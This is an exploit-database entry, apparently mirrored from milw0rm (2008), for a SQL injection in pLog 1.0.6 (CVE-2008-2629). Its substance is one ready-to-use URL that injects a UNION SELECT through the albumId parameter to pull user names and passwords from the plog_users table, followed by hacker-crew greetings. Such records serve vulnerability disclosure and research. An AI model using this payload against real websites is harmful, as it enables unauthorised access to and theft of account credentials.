[] NeoSense

PLog 1.0.6 - 'albumID' SQL Injection

Author: DreamTurk
type: webapps
platform: php
port: 
date_added: 2008-06-01 
date_updated: 2016-12-07 
verified: 1 
codes: OSVDB-46113;CVE-2008-2629 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comlifetype-1.0.6.zip

pLog (albumId) Remote Sql İnj.

DreamTurk / dream@dr3amturk.org

Down : http://sourceforge.net/project/showfiles.php?group_id=83964&package_id=86556

http://localhost/index.php?op=ViewAlbum&albumId=-1/**/union/**/select/**/0,1,user,password,4,5,6,7,8 from plog_users/*&blogId=1

4ever sqL L0v3r'Z Crew 2008 http://coderx.org

Greatz : Cr@zy_King & BLasTer & DarKxBoyZ & Rmx & TR_ip & str0ke

-----------

# milw0rm.com [2008-06-02]